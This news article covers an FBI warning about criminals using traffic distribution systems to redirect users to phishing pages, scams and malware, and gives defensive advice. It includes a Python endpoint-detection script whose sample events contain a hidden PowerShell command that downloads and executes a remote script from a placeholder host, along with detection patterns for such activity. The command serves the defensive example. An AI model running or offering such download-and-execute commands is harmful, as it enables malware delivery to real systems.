FBI Warns Cybercriminals Are Using Traffic Distribution Systems to Send Users to Fraud Sites


The FBI is warning internet users and businesses about cybercriminals using traffic distribution systems to silently redirect people to fraudulent websites, phishing pages, malware downloads, and ransomware-related infrastructure.

The warning came through an FBI Internet Crime Complaint Center public service announcement published on June 18, 2026. The agency said criminals use malicious traffic distribution systems, also known as TDSs, to route victims through hidden redirect chains after they click ads, visit compromised pages, sign up for promotions, or download applications.

A TDS is not malicious by default. Legitimate advertisers, publishers, and businesses use similar technology to manage web traffic. The risk comes when criminals use it to decide which users should see a scam, which users should receive malware, and which users should see harmless content to avoid detection.

What is a traffic distribution system?

A traffic distribution system sits between the first link a person clicks and the final page they see. It can evaluate a visitor in seconds and then send that visitor to a destination chosen by the operator.

In legitimate use, that may mean routing visitors to different pages by country, device type, browser, or marketing campaign. In criminal use, it can send selected victims to fake login forms, fraudulent investment pages, malicious software updates, or compromised websites.

The FBI said criminals are using TDSs to gain access to victim networks for ransomware or financial scams. The agency also warned that stolen access to accounts or networks may be sold to other criminals, including ransomware groups.

| Stage | How the attack works | Risk for users and businesses |
|---|---|---|
| Initial click | A user clicks a phishing email link, poisoned search result, ad, or compromised website link | The user may not realize the journey has changed |
| Traffic filtering | The TDS checks the visitor's IP address, location, browser, operating system, and device | Attackers can target only useful victims |
| Hidden redirect | The system sends selected users through intermediate nodes | Security tools may struggle to trace the final destination |
| Final payload | The user lands on a phishing page, scam site, or malware download page | Credentials, money, or network access may be stolen |

Why these redirects are hard to spot

Malicious TDS activity can happen quickly and without a visible warning. A victim may click what looks like a normal ad or search result, then land on a page that closely imitates a trusted website.

The FBI says attackers can use a chain of intermediate nodes to hide the final malicious destination. This helps them bypass traditional firewall rules that block known malicious websites, because the first visible link may not be the final scam page.

The filtering feature makes the threat more difficult for defenders. A security researcher, website owner, or automated scanner may see a clean page, while a user in a targeted region gets redirected to a phishing portal or malware download.

How criminals drive users into TDS traps

Cybercriminals use several methods to push victims into malicious redirect chains. One method involves phishing emails that include links to pages controlled by attackers.

Another method involves search engine optimization poisoning, where criminals manipulate search results or place fraudulent ads that mimic legitimate sites. Users who search for a product, service, software update, or support page may click a result that looks safe.

Attackers also compromise legitimate websites. According to the IC3 alert, criminals may gain access through weak admin passwords or outdated website plugins and themes, then edit website code so visitors are sent into a malicious TDS chain.

  • Phishing emails can send users to redirect pages that look harmless at first.
  • Poisoned search results can place fraudulent pages near the top of search results.
  • Compromised websites can redirect visitors without changing the visible site design.
  • Fake software update prompts can deliver malware instead of legitimate patches.
  • Stolen network access can later support ransomware or other financial crime.

What users should do now

The FBI recommends caution before clicking advertisements, especially when a link looks similar to a known brand but uses an unusual spelling, subdomain, or domain ending. Users should type important website addresses directly into the browser when dealing with banking, email, crypto, government, or business accounts.

Strong, unique passwords remain important, but they are not enough on their own. Users should enable two-factor authentication for important accounts, especially email, financial, cloud storage, and workplace services.

Users should also avoid installing software updates from random pop-ups. Operating system updates, browser updates, and app updates should come from official app stores, built-in update tools, or verified vendor websites.

| Protection step | Who should use it? | Why it helps |
|---|---|---|
| Check URLs before clicking | Everyone | Helps avoid lookalike domains and fake ads |
| Use two-factor authentication | Everyone | Reduces account takeover risk after password theft |
| Update plugins and themes | Website owners | Closes common paths used to compromise sites |
| Use a web application firewall | Businesses and site owners | Can block suspicious traffic before it reaches the site |
| Monitor endpoints for scripts | IT teams | Helps detect malicious js, ps1, and svg payload activity |

What businesses and website owners should check

Businesses should monitor endpoints for suspicious script activity. The FBI specifically called out unusual execution of wscript.exe, cscript.exe, and PowerShell scripts that make web requests for suspicious js, ps1, or svg files.
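As an added illustration of that monitoring advice (example code written for this article, not published by the FBI or IC3), the script below runs the two signals the alert describes over a handful of constructed process-creation events: a script host (wscript.exe, cscript.exe, PowerShell) requesting a .js, .ps1 or .svg file over HTTP, and a script host launched by a browser or by another script host. Host names, paths and the cdn.example.invalid URL are made up for the sample.

```python
import re

# Constructed process-creation events (hypothetical hosts and paths), shaped
# like an EDR or Sysmon Event ID 1 export. Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-0142", "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\a\AppData\Local\Temp\invoice.js"'},
    {"host": "ws-0142", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"iex((New-Object Net.WebClient)"
                ".DownloadString('https://cdn.example.invalid/a/s.ps1?v=3'))\""},
    {"host": "srv-07", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //nologo C:\Scripts\inventory.vbs"},
    {"host": "ws-0099", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe https://example.com/update.js"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
SUSPECT_EXT = (".js", ".ps1", ".svg")          # file types named in the IC3 alert
URL_RE = re.compile(r"https?://[^\s\"'`<>()]+", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def suspect_urls(cmdline: str) -> list[str]:
    """URLs in the command line whose path (query string ignored) ends in a payload extension."""
    return [u for u in URL_RE.findall(cmdline)
            if u.split("?", 1)[0].lower().endswith(SUSPECT_EXT)]

def evaluate(event: dict) -> list[str]:
    """Return the reasons an event matches; an empty list means no alert."""
    image = basename(event["image"])
    if image not in SCRIPT_HOSTS:
        return []                      # browsers fetching .js themselves are normal
    reasons = []
    urls = suspect_urls(event["cmdline"])
    if urls:
        reasons.append(f"{image} requests payload file(s): {', '.join(urls)}")
    parent = basename(event["parent"])
    if parent in BROWSERS:
        reasons.append(f"{image} launched by browser {parent}")
    if parent in SCRIPT_HOSTS and image != parent:
        reasons.append(f"script host chain {parent} -> {image}")
    return reasons

def scan(events: list[dict]) -> list[tuple[str, str]]:
    """(host, reason) pairs for every event that matches at least one signal."""
    return [(e["host"], r) for e in events for r in evaluate(e)]

if __name__ == "__main__":
    for host, reason in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: {reason}")
```

Only the two ws-0142 events fire; the scheduled cscript.exe job and the browser's own .js fetch are left alone, which is the distinction an analyst tuning this rule needs to keep.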

Website owners should audit CMS administrator accounts, database accounts, FTP accounts, and hosting accounts. Weak passwords, reused credentials, outdated themes, and vulnerable plugins can give attackers the access they need to modify website code.

Organizations should also train employees to recognize phishing and social engineering attempts. A malicious TDS campaign often starts with a normal-looking email, ad, or search result, so user awareness can stop the attack before the redirect chain begins.

The FBI says victims should report suspected website intrusions or cybercrime through the Internet Crime Complaint Center. Reports can help investigators track related infrastructure, identify repeat activity, and warn other potential victims.

People facing an ongoing cybercrime, serious threat, or urgent security incident can also contact a local field office through the FBI cybercrime reporting page.

The main takeaway is simple: redirects are no longer just a marketing tool. Criminals now use them to filter victims, hide scam infrastructure, bypass some defenses, and deliver phishing pages or malware with little visible warning.

For individuals, careful clicking and two-factor authentication reduce the risk. For businesses, patching, account audits, endpoint monitoring, and user training should become part of the response to the latest IC3 warning and broader FBI cyber guidance.

FAQ

What is a traffic distribution system?

A traffic distribution system, or TDS, is a tool that routes web visitors to different destinations after they click a link, ad, promotion, download page, or website. Legitimate businesses use TDS technology, but criminals can abuse it to send selected users to scam pages, phishing sites, or malware downloads.

Why did the FBI warn about malicious TDS attacks?

The FBI warned that cybercriminals use malicious traffic distribution systems to redirect users to fraudulent websites, steal credentials, deliver malware, and gain network access that may later support ransomware or financial scams.

How do cybercriminals get users into TDS redirect chains?

Criminals may use phishing emails, poisoned search results, fraudulent ads, fake promotions, software download pages, or compromised legitimate websites to push users into a malicious redirect chain.

Why are malicious TDS attacks difficult to detect?

A malicious TDS can filter visitors by IP address, location, operating system, browser, and device type. This lets attackers show malicious content only to selected victims while showing harmless pages to researchers or security scanners.

How can users protect themselves from TDS-related scams?

Users should check URLs before clicking ads or unfamiliar links, avoid fake update prompts, use strong unique passwords, enable two-factor authentication, and visit sensitive websites by typing the address directly into the browser.

What should businesses do to reduce TDS attack risk?

Businesses should patch CMS platforms, plugins, and themes, audit web hosting and administrator accounts, use strong passwords and two-factor authentication, monitor endpoints for suspicious script execution, and train employees to spot phishing attempts.
